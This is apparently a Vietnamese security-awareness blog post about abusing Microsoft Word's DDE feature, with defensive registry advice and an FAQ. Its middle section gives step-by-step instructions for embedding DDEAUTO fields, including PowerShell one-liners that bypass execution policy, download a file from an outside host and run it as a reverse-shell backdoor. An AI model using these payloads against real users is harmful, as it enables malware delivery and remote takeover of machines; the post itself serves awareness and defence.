Microsoft Word là phần mềm soạn thảo văn bản hầu như máy tính nào cũng được cài đặt. Vậy làm thế nào hacker có thể “hack” máy tính của bạn chỉ với file word? Trong Word có chức năng gọi là DDE, và Hacker có thể lợi dụng tính năng này để phát tán Virus.
Vậy DDE là gì?
DDE là viết tắt của Dynamic Data Exchange và đây là một tính năng của Office cho phép ứng dụng Office tải dữ liệu từ các ứng dụng Office khác. Ví dụ: tệp Word có thể cập nhật bảng bằng cách kéo dữ liệu từ tệp Excel mỗi khi tệp Word được mở. Tính năng này giúp Word có thể chia sẻ và trao đổi dữ liệu với các ứng dụng khác.
DDE có khả năng cho phép file Word khi được mở có thể thực thi đoạn mã lưu trữ trong một file khác và cho phép các ứng dụng có thể gửi bản cập nhật dữ liệu mới.
Ngay khi đọc xong câu này, các bạn nên mở máy tính/laptop lên và kiểm tra xem Microsoft Office của bạn có bật chức năng DDE này hay không.
Nhấn nút cửa sổ Windown -> gõ tìm “Registry Editor” –> Truy cập theo từng mục như sau: \HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ –> Nhìn cột Name nếu các bạn thấy tên là “AllowDDE” thì lập tức xóa ngay nhé (Ngoại trừ các bạn hiểu rõ về chức năng này còn không thì hãy xóa đi nhé!)
Nguy hiểm vậy tại sao Microsoft lại không fix?
Vào ngày 23/08/2017, báo cáo đầu tiên đã được gửi lên Microsoft.
Đến ngày 26/09/2017, Microsoft đã phản hồi lại rằng đây là 1 TÍNH NĂNG và Microsoft đã đưa ra khuyến cáo để người dùng Office có thể tự bảo vệ mình khỏi các cuộc tấn công. Cách đơn giản nhất để giữ an toàn là cẩn trọng trước mọi thông điệp lạ hiện ra mỗi khi mở các tệp văn bản.
Đến 12/2017, Microsoft chính thức cập nhật thay đổi cho Microsoft Word, vẫn giữ chức năng DDE, nhưng mặc định khi người dùng mở file word có DDE, link (hoặc lệnh) sẽ không được kích hoạt tự động.
Kỹ thuật đính kèm Virus vào file Word
Đây là không hẵn là chèn virus mà sẽ kích hoạt lệnh tải virus về và kích hoạt khi bạn mở file Word lên.
Bây giờ mình sẽ tiến hành trình bày chi tiết cách hacker đã chiếm quyền điều khiển máy bạn bằng file Word.
Về cơ bản, đầu tiên mở file Word lên, vào Insert -> Quick Parts -> Field…
Sẽ có 1 bảng hiện ra, tiến hành click double vào ” = (Formula ) ”
1 dòng chữ sẽ hiện ra, chuột phải vào, chọn “Toggle Field Codes”
Thay đổi nội dung trong ngoặc thành code sau:
DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/k calc.exe"
Mục đích của câu lệnh trên: truy cập và Command Prompt (cmd) trên Windows và mở ứng dụng máy tính (calc.exe )
Save lại và khi mở file này lên, Word sẽ hỏi bạn có muốn bật calc.exe không?
Khi nhấn YES, ứng dụng máy tính sẽ được mở
Câu hỏi đặt ra ở đây là các bạn có thể thấy file Word có thể truy cập vào cmd của windown, vậy thay vì mở ứng dụng máy tính , ta có thể thực thi nhiều quyền khác như, mở powerShell, tạo backdoor, tải file virus về máy và chiếm quyền điều khiển máy tính.
Ví dụ câu lệnh:
{ DDEAUTO "C:\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'test1.txt' # " "for security reasons click YES" }
Mục đích: Tải file txt từ trang web trên và thực thi mở file vừa tải.
{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'RCE.exe' # " "for security reasons click YES" }
Thay đổi từ file txt thành file EXE và thực thi ( tùy mục đích file EXE này được tạo ra với mục đích gì ví dụ như Malware, Virus, Trojan,….. ) Trong video mình demo, mục đích file EXE là reverse backdoor shell windows.
Cách phòng chống
Với mức độ nguy hiểm như vậy, chúng ta nên làm gì?
- Đầu tiên kể đến trước là làm lưu ý trên cùng mình vừa nêu.
- Quét virus với file vừa tải về
Ví dụ trang web https://www.virustotal.com/gui/
- Cẩn thận những file từ những nguồn không uy tín
- Nếu nghi ngờ, hãy ra quán nét để test trước .
Hi vọng qua bài viết này có thể bảo vệ mọi người tránh những thủ đoạn nguy hiểm của các hacker
Cảm ơn mọi người đã dành thời gian đọc bài viết này ^^! Chúc mọi người một ngày tốt lành.
Bài viết của tác giả Nguyễn Quốc Khánh chia sẻ trong Group Nhận thức về an ninh mạng cùng Hieupc và những người bạn – 7Onez.com
Câu hỏi thường gặp
DDE trong Word là gì và tại sao nó lại nguy hiểm?
DDE (Dynamic Data Exchange) là tính năng của Microsoft Office cho phép các ứng dụng Office trao đổi dữ liệu. Hacker có thể lợi dụng DDE để chèn mã độc vào file Word, thực thi các lệnh nguy hiểm trên máy tính của bạn khi file được mở.
Tôi có thể làm gì để bảo vệ máy tính khỏi nguy cơ này?
Hãy xóa mục “AllowDDE” trong Registry Editor (HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\) hoặc cập nhật Microsoft Office lên phiên bản mới nhất. Quan trọng nhất là luôn cẩn thận với các file Word từ nguồn không tin cậy.
Nếu tôi vô tình mở một file Word chứa mã độc, điều gì sẽ xảy ra?
Tùy thuộc vào mã độc được chèn, máy tính của bạn có thể bị nhiễm virus, bị đánh cắp thông tin, hoặc bị điều khiển từ xa. Vì vậy, hãy luôn quét virus cho các file đáng ngờ trước khi mở.
Hay quá ad ơi